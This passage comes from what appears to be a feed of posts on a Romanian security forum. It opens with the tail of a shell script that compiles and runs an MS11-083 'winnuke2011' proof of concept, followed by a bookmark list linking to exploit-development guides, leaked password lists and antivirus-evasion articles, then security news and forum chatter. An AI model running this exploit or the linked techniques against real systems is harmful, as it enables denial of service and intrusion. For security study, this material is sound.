        while \`true\`;do /sbin/ping -c 1 \$1;done
        EOF
        chmod +x ping.sh
        gcc winnuke2011.c -o winnuke2011
        ./winnuke2011

     Source: [C] MS11-083 PoC winnuke2011.sh - Pastebin.com
  9. I have decided, since most members probably have a Facebook account, to create a Facebook page where we will post general information about RST and administrative information, as well as current news from the IT field, especially news about hacking, IT security and programming, basically links to topics here or external links. Page: https://www.facebook.com/pages/Romanian-Security-Team/163592527017735 Or, shorter: http://www.facebook.com/rstforum
  10. Blogs, Feeds, Guides & Links

    I was cleaning out my bookmarks, de-cluttering twitter favourites and closing a few tabs. Re-saw a few 'hidden gems' as well as repeatedly finding links for people, so I thought I would try and 'dump' them all in one place. These are roughly sorted; if you're wanting something better, I highly recommend having a look at the pentest-bookmarks.

    Programming/Coding
    [bash] Advanced Bash-Scripting Guide - http://tldp.org/LDP/abs/html/
    [bash] Bash shell scripting tutorial - http://steve-parker.org/sh/sh.shtml
    [bash] Bourne Shell Reference - http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/
    [CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby - http://hyperpolyglot.org/scripting

    Offensive Security's Pentesting With BackTrack (PWB) Course
    [Pre-course] Corelan Team - http://www.corelan.be
    [Pre-course] The Penetration Testing Execution Standard - http://www.pentest-standard.org/index.php/Main_Page
    [Hash] NTLM Decrypter - http://www.md5decrypter.co.uk/ntlm-decrypt.aspx
    [Hash] reverse hash search and calculator - http://goog.li
    http://security.crudtastic.com/?p=213

    Tunnelling / Pivoting
    [Linux] SSH gymnastics with proxychains - http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
    [Windows] Nessus Through SOCKS Through Meterpreter - http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php

    WarGames / Online Challenges
    [WarGames] Title - http://securityoverride.com
    [WarGames] Title - http://intruded.net
    [Challenge] The Ksplice Pointer Challenge - http://blogs.oracle.com/ksplice/
    [WarGames] Title - http://spotthevuln.com
    [WarGames] Title - http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html
    [WarGames] Title - http://ftp.hackerdom.ru/ctf-images/

    Exploit Development (Programs)
    [Download] Title - http://www.oldapps.com/
    [Download] Title - http://www.oldversion.com/
    [Download] Title - http://www.exploit-db.com/webapps/

    Misc
    [RSS] Open Penetration Testing Bookmarks Collection - https://code.google.com/p/pentest-bookmarks/downloads/list
    [ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses - http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html
    [DIY] Repair a Broken Ethernet Plug - http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/
    [Desktop] Ubuntu Security - http://ubuntuforums.org/showthread.php?t=510812
    [TechHumor] Title - https://www.xkcd.com
    [TechHumor] Title - http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf

    Exploit Development
    [Guides] Corelan Team - http://www.corelan.be
    [Guide] From 0x90 to 0x4c454554, a journey into exploitation. - http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html
    [Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities - http://resources.infosecinstitute.com/intro-to-fuzzing/
    TiGa's Video Tutorial Series on IDA Pro - http://www.woodmann.com/TiGa/idaseries.html
    [Guide] Advanced Windows Buffer Overflows - http://labs.snort.org/awbo/
    [Guide] Stack Based Windows Buffer Overflow Tutorial - http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt
    [Guide] SEH Stack Based Windows Buffer Overflow Tutorial - http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
    [Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation - http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
    [Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability - http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
    [Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump - http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
    [Linux] Linux exploit development part 1 – Stack overflow. - http://sickness.tor.hu/?p=363
    [Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg - http://sickness.tor.hu/?p=365
    [Linux] Linux exploit development part 3 – ret2libc - http://sickness.tor.hu/?p=368
    [Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt - http://sickness.tor.hu/?p=378
    [TechHumor] Title -
    [TechHumor] Title - http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html

    Exploit Development (Case Studies/Walkthroughs)
    [Web] Finding 0days in Web Applications - http://www.exploit-db.com/finding-0days-in-web-applications/
    [Windows] Offensive Security Exploit Weekend - http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/
    [Windows] From vulnerability to exploit under 5 min - http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html

    Exploit Development (Patch Analysis)
    [Windows] A deeper look at ms11-058 - http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058
    [Windows] Patch Analysis for MS11-058 - https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058
    [Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability - http://j00ru.vexillium.org/?p=893
    [Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities - https://www.net-security.org/article.php?id=1613

    Exploit Development (Metasploit Wishlist)
    [ExploitDev] Metasploit Exploits Wishlist ! - http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html
    [Guide] Porting Exploits To Metasploit Part 1 - http://www.securitytube.net/video/2118

    Passwords & Rainbow Tables (WPA)
    [RSS] Title - http://ob-security.info/?p=475
    [RSS] Title - http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/
    [RSS] Title - http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html
    [WPA] Offensive Security: WPA Rainbow Tables - http://www.offensive-security.com/wpa-tables/
    [Tool] Ultra High Security Password Generator - https://www.grc.com/passwords.htm
    [Guide] Creating effective dictionaries for password attacks - http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html
    [Leaked] Diccionarios con Passwords de Sitios Expuestos - http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml
    [Download] Index of / - http://svn.isdpodcast.com/wordlists/
    [Guide] Using Wikipedia as brute forcing dictionary - http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary
    [Tool] CeWL - Custom Word List generator - http://www.digininja.org/projects/cewl.php
    [Download] Title - http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
    [Leaked] Passwords - http://www.skullsecurity.org/wiki/index.php/Passwords

    Cheat-Sheets
    [OS] A Sysadmin's Unixersal Translator - http://bhami.com/rosetta.html
    [WiFi] WirelessDefence.org's Wireless Penetration Testing Framework - http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html

    Anti-Virus
    [Metasploit] Facts and myths about antivirus evasion with Metasploit - http://schierlm.users.sourceforge.net/avevasion.html
    [Terms] Methods of bypassing Anti-Virus (AV) Detection - NetCat - http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html

    Privilege Escalation
    [Linux] Hacking Linux Part I: Privilege Escalation - http://www.dankalia.com/tutor/01005/0100501004.htm
    [Windows] Windows 7 UAC whitelist - http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
    [Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges - http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/

    Metasploit
    [Guide] fxsst.dll persistence: the evil fax machine - http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html
    [Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec - http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/
    [Guides] Metasploit Unleashed - http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
    [Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 - http://www.securitytube.net/video/1175

    Default Generators
    [WEP] mac2wepkey - Huawei default WEP generator - http://websec.ca/blog/view/mac2wepkey_huawei
    [WEP] Generator: Attacking SKY default router password - http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password

    Statistics
    [Defacements] Zone-H - http://www.zone-h.org
    [ExploitKits] CVE Exploit Kit list - http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm

    Cross Site Scripting (XSS)
    [Guide] vbSEO – From XSS to Reverse PHP Shell - http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
    [RSS] Title - http://www.thespanner.co.uk/2009/03/25/xss-rays/

    Podcasts
    [Weekly] PaulDotCom - http://pauldotcom.com/podcast/psw.xml
    [Monthly] Social-Engineer - http://socialengineer.podbean.com/feed/

    Blogs & RSS
    [RSS] SecManiac - http://www.secmaniac.com
    [Guides] Carnal0wnage & Attack Research - http://carnal0wnage.attackresearch.com
    [RSS] Contagio - http://contagiodump.blogspot.com
    [News] THN : The Hacker News - http://thehackernews.com
    [News] Packet Storm: Full Disclosure Information Security - http://packetstormsecurity.org
    [Guides] pentestmonkey | Taking the monkey work out of pentesting - http://pentestmonkey.net
    [RSS] Darknet - The Darkside | Ethical Hacking, Penetration Testing & Computer Security - http://www.darknet.org.uk
    [RSS] Irongeek - http://www.irongeek.com
    [Metasploit] Room 363 - http://www.room362.com
    [Guides] Question Defense: Technology Answers For Technology Questions - http://www.question-defense.com/
    [Guides] stratmofo's blog - http://securityjuggernaut.blogspot.com
    [Guides] TheInterW3bs - http://theinterw3bs.com
    [Guides] consolecowboys - http://console-cowboys.blogspot.com
    [Guides] A day with Tape - http://adaywithtape.blogspot.com
    [Guides] Cybexin's Blog - Network Security Blog - http://cybexin.blogspot.com
    [RSS] BackTrack Linux - Penetration Testing Distribution - http://www.backtrack-linux.org/feed/
    [RSS] Offensive Security - http://www.offensive-security.com/blog/feed/
    [RSS] Title - http://www.pentestit.com
    [RSS] Title - http://michael-coates.blogspot.com
    [RSS] Title - http://blog.0x0e.org
    [RSS] Title - http://0x80.org/blog
    [RSS] Title - http://archangelamael.shell.tor.hu
    [RSS] Title - http://archangelamael.blogspot.com
    [RSS] Title - http://www.coresec.org
    [RSS] Title - http://noobys-journey.blogspot.com
    [RSS] Title - http://www.get-root.com
    [RSS] Title - http://www.kislaybhardwaj.com
    [RSS] Title - https://community.rapid7.com/community/metasploit/blog
    [RSS] Title - http://mimetus.blogspot.com
    [RSS] Title - http://hashcrack.blogspot.com
    [RSS] Title - https://rephraseit.wordpress.com
    [RSS] Title - http://www.exploit-db.com
    [RSS] Title - http://skidspot.blogspot.com
    [RSS] Title - http://grey-corner.blogspot.com
    [RSS] Title - http://vishnuvalentino.com
    [RSS] Title - http://ob-security.info

    Source: http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html
  11. New, Faster Firefox 9 Beta is Ready for Testing November 10th, 2011 A new Firefox Beta for Windows, Mac and Linux is now available for download and testing. This beta enhances JavaScript performance and adds developer tools that make Web browsing much faster. What’s New in Firefox Beta: Type Inference: Firefox Beta adds Type Inference to make JavaScript significantly faster. To learn more about how rich websites and Web apps with lots of pictures, videos and 3D graphics will load faster in Firefox, check out this blog post. Mac OS X Lion Support: Firefox Beta has a new look that matches the Mac OS X Lion application toolbar and icon styles. Firefox Beta also supports the two finger swipe navigation gesture and makes it easier to use multiple monitors. Do Not Track JavaScript Detection: Firefox Beta enables JavaScript to show developers when users choose to opt-out of behavioral tracking with the Do Not Track privacy feature. Chunked XHR Support: Firefox Beta supports chunking for XHR requests so websites can receive data that’s part of a large XHR download in progress. This helps developers make websites and Web apps faster, especially those that download large sets of data or via AJAX. If you’re a developer, please visit the Firefox for Developers page. Download: http://www.mozilla.org/en-US/firefox/channel/
  12. Disable AutoRun to Stop 50% of Windows Malware Threats According to a biannual Security Intelligence Report from Microsoft, AutoRun, the feature in Windows that automatically executes files when you plug in a USB or connect to a network, accounts for almost half of all malware infections. That's really damn high. To be clear, these are infections that don't require any user input from you, so it's kind of not your fault that your computer gets infected. By turning off AutoRun, you'll add an extra step to certain tasks, but it's worth it to cut down on malware 50%. What's also interesting in this report is that Windows XP SP3 systems get infected about ten times as much as Windows 7 SP1 64-bit systems, and six times as much vs. 32-bit Windows 7 systems. That alone is one reason why you might want to upgrade your parents' machines to Windows 7. The easiest way to disable AutoRun is to download a free utility like Disable AutoRun or previously mentioned Panda USB Vaccine, run it, and call it a day (these apps are made specifically to turn off AutoRun). On the other hand, if you're comfortable with editing the registry, here's a quick guide to doing it yourself. Disable autorun: http://antivirus.about.com/od/securitytips/ht/autorun.htm USB Vaccine: http://www.pandasecurity.com/homeusers/downloads/usbvaccine/ Source: http://lifehacker.com/5858703/disable-autorun-to-stop-50-of-windows-malware-threats
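The registry edit the article points to, written out as an added example that is not from the article or the linked guide: it audits the NoDriveTypeAutoRun policy value in both the machine and user hives and can set it to 0xFF, the bitmask that disables AutoRun for every drive type. The key paths and value name are the standard Windows policy locations; the function names are mine.

```powershell
# Added example, not part of the original post. Audits and hardens the
# AutoRun policy value. NoDriveTypeAutoRun is a bitmask of drive types for
# which AutoRun is disabled; 0xFF covers all drive types.
$AutoRunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
)

function Get-AutoRunPolicy {
    # Report the current value in each hive; "not set" means the OS default
    # applies, which on XP is the weak setting the article is warning about.
    foreach ($key in $AutoRunKeys) {
        $value = (Get-ItemProperty -Path $key -Name NoDriveTypeAutoRun `
                  -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
        [pscustomobject]@{
            Key      = $key
            Value    = if ($null -eq $value) { 'not set' } else { '0x{0:X2}' -f $value }
            AllOff   = ($value -eq 0xFF)   # $true only when every drive type is covered
        }
    }
}

function Disable-AutoRun {
    # Write NoDriveTypeAutoRun = 0xFF as a REG_DWORD in both hives.
    # The HKLM write needs an elevated shell; the setting applies at next sign-in.
    foreach ($key in $AutoRunKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name NoDriveTypeAutoRun -Value 0xFF -Type DWord
    }
}

Get-AutoRunPolicy | Format-Table -AutoSize
# Disable-AutoRun   # uncomment to apply, then re-run Get-AutoRunPolicy to confirm
```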
  13. Suricata IDPE 1.1 Site: openinfosecfoundation.org Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools. Changes: Performance, accuracy, and stability were improved. Many HTTP rule keywords were added. Several SSL keywords have been added. Event suppression support was added. SCTP decoding support was added. IPS mode was improved. An SMTP parser was added. Protocol detection was improved. Extended HTTP output was added. AF_PACKET support was added. PF_RING support was improved. Pcap logging was added. The stream engine was improved. Download: http://packetstormsecurity.org/files/download/106889/suricata-1.1.tar.gz
  14. The post is too long, I'll talk to kwe. The double post isn't a problem in this case.
  15. 1. You're not the only person who got a warning for this, but you're the only one complaining. 2. The Offtopic category is for things that have no place in any other category, and your topic (I honestly have no idea which one), which was a request, belonged in the Requests category made specifically for that. 3. I moved the topic to keep order on the forum, that is, every topic in its place, so people know what they can find and where, and don't run into discussions about "Huidu had an accident" under Programming or English Tutorials. 4. If you had looked at the topics under Announcements, you would have noticed that one of them lists the reasons a warning can be given, and posting carelessly in the wrong category is one of them. 5. I don't enjoy moving topics around. Yes, if it had been something useful to many, as has happened before, you wouldn't have received a warning. I mean, I moved a programming topic from Tutorials to Programming and even gave a "+" to the poster because it was useful. 6. If you were hanging around Offtopic, you would have noticed that I created about 3 threads there stating explicitly that help topics and requests have their own categories and should not be posted there. 7. I've stopped tolerating topics that have nothing to do with IT here, and you should understand why. It would be pretty stupid to see nothing but topics like "My hair is rough and my ends are split, what can I do?" or other crap around here. 8. I don't know of any "any kind of requests". It's an IT forum, let's try to keep the content IT, let's not all start with personal problems. There's 4chan, softpedia and other forums that probably have special categories for everything. Understand?
  16. Nytro

    Curiosity

    Which functions do you mean? Those functions are probably in "msvcrt.dll" - Microsoft Visual C Runtime, that is, a DLL containing the common functions. It seemed a bit odd to me, but just yesterday I was doing exactly this, and I saw that a program compiled with MinGW (the port of the GCC compiler to Windows) also "links" executables against msvcrt.dll. They don't need to be defined in the headers, and they aren't; the functions are part of various libraries (WinAPI for example - kernel32.dll, user32.dll...) that your program is linked against through the linker. You only need the function's definition and the library, so the linker knows where to get the function from. For example, the "connect" function, with which I connect a socket to an IP address, is in ws2_32.dll; you include the winsock2.h file, but that's not enough, because the library it lives in must also be known, and that has to be given to the compiler through a parameter: -l. CodeBlocks has a GUI for this; the required files have the extensions ".lib" or ".a".
  17. And what if someone lightly touches the mirror by mistake?
  18. Stop the nonsense, let's go to Hanul Drumetului :->
  19. Um, I think you mean: char x = 49; That is, x is the ASCII code of the character '1'.
  20. Mexican drug runners torture and decapitate blogger El Mod of social network ritually murdered By John Leyden 10th November 2011 11:31 GMT The moderator of a Mexican social network has been tortured and ritually murdered by local drug lords in the latest cartel-related killing in the country. The victim, identified in an accompanying message as "El Rascatripas" (The Fiddler/Scratcher) was tortured and decapitated before his body was dumped in the early hours of Wednesday morning beside a statue of Christopher Columbus near the Texas border and outside the town of Nuevo Laredo. A blanket placed near the body featured a chilling message, scrawled in ink: "Hi I’m ‘Rascatripas’ and this happened to me because I didn’t understand I shouldn’t post things on social networks." Local reports suggest the man was a moderator on the social network Nuevo Laredo en Vivo. His death brings the death toll of bloggers and social media activists in the town – all apparent victims of the ultra-ruthless Zetas cartel – to four over the last two months. A man and a woman, who was disembowelled beforehand, were found strung from an overpass in the town in mid-September. Less than two weeks later, Nuevo Laredo en Vivo moderator Marisol Macias Castaneda, also known as The Laredo Girl, was decapitated and dumped – like the latest victim – by the Christopher Columbus statue. More details, including a grisly picture of the crime scene, can be found in local media reports here and here. A bloody turf war between the Gulf Cartel (CDG) and their former enforcers, Los Zetas, is at its bloodiest in the states of eastern Tamaulipas, around the northern city of Monterrey and in Tamaulipas (the location of Nuevo Laredo). Some estimates suggest that as many as 40,000 Mexicans had lost their lives as a result of the escalating Mexican drug wars, which have included a terrorist-style attack on a Monterrey casino in August that claimed the lives of 53 people. 
The April 2011 Tamaulipas massacre, involving the execution of an estimated 190-plus abducted bus passengers, and the Monterrey casino attack had both been blamed on the Zetas. Wired reports that locals are using social media tools to carry real-time reporting of firefights between drug runners and local police and cartel checkpoints on the region's dangerous roads as well as criticism of local drug lords. Drug cartels, in particular the Zetas, take a ruthless line on those reporting their activities online, treating them as snitches and murdering them as a grisly warning to others. Recent plans by a faction of Anonymous to release details of associates of Los Zetas were abandoned last weekend amid confusion over whether the alleged kidnapping of a member of the activist collective, the incident that provoked OpCartel, had ever actually taken place. Source: http://www.theregister.co.uk/2011/11/10/narco_blogger_murdered/
  21. If you open cmd with "Run as Administrator", is it the same? I'm asking because I too struggled for hours to understand a valid piece of code that didn't work because it had to be run as Administrator... PS: Post the source code if you can, I'd be interested in looking over it.
  22.

    C:\Windows>telnet www.rstcenter.com 80
    GET / HTTP/1.1
    Host: www.rstcenter.com

    HTTP/1.1 200 OK
    Server: LBA T2900 LINUX SECURITY GROUP
    Date: Thu, 10 Nov 2011 15:34:28 GMT
    Content-Type: text/html
    Connection: keep-alive
    Last-Modified: Wed, 03 Nov 2010 23:06:25 GMT
    ETag: "759ff-27-4942e172bde40"
    Accept-Ranges: bytes
    Content-Length: 39
    Cache-Control: max-age=7200
    Expires: Thu, 10 Nov 2011 17:34:28 GMT

    <img src="stfu.jpg" alt="" title="" />

    Connection to host lost.

    C:\Windows>

    That's without a browser.
  23. I think of myself first, naturally. And I ask myself: "What have I done wrong for the cops to want to pick me up?", and absolutely nothing comes to mind. So I have no stress at all, and the same goes for 96% (let's say) of the people here. Then, if I think about it a bit, I realize that a lot can be gleaned from my posts: first and last name, the high school I went to, the university I'm at, and more. On a "trading" forum, where transactions worth millions of dollars were being made (cards and other nasty things), supposedly an FBI agent had infiltrated, had been active for a long time and had even become some kind of administrator, and all of a sudden they busted a large part of them. But there it was about money, not about filelist accounts sold for 1 euro of credit like here. Admittedly, I once saw an STS IP around here, but they're people too, basically just like us, who might find who knows what useful information here; I don't really think they're "spying" on anyone because, let's be serious, they really have no one to spy on (did I hurt your hacker egos?).
  24. Computerized Prison doors hacked with vulnerabilities used by Stuxnet worm Security holes in the computer systems of federal prisons in the United States can effectively allow hackers to trigger a jailbreak by remote control. The discovery of the Stuxnet worm has alerted governments around the world about the possibility of industrial control systems being targeted by hackers. A team of researchers with John Strauchs, Tiffany Rad and Teague Newman presented their findings at a recent security conference. They said the project wasn't really all that difficult -- it just took a little time, some equipment bought online and a basement workspace. The idea for the research came about from work that Strauchs had done previously. "I designed a maximum security prison security system. That is, I did the engineering quite a few years ago and literally on Christmas Eve, the warden of that prison after it was occupied, called me and told me all the doors had popped open, including on death row, which of course sent chills down my spine. So we fixed that problem very quickly. It was a minor technical thing that had to do with the equipment used, but the gist of it was it made me think if that could be done accidentally, what was the extent of what you could do if you did it deliberately?" The security systems in most American prisons are run by special computer equipment called industrial control systems, or ICS. They are also used to control power plants, water treatment facilities and other critical national infrastructure. ICS has increasingly been targeted by hackers because an attack on one such system successfully sabotaged Iran's nuclear program in 2009. A malicious cyber-intruder could "destroy the doors," by overloading the electrical system that controls them, locking them permanently open, said Mr. Strauchs, now a consultant who has designed security systems for dozens of state and federal prisons. The U.S. Department of Homeland Security has confirmed the validity of their results and the researchers have already demonstrated the attack to federal and state Bureaus of Prisons and a number of federal agencies. Source: http://thehackernews.com/2011/11/computerized-prison-doors-hacked-with.html
  25. Yes, I don't want to pay 8-10 lei for a beer either.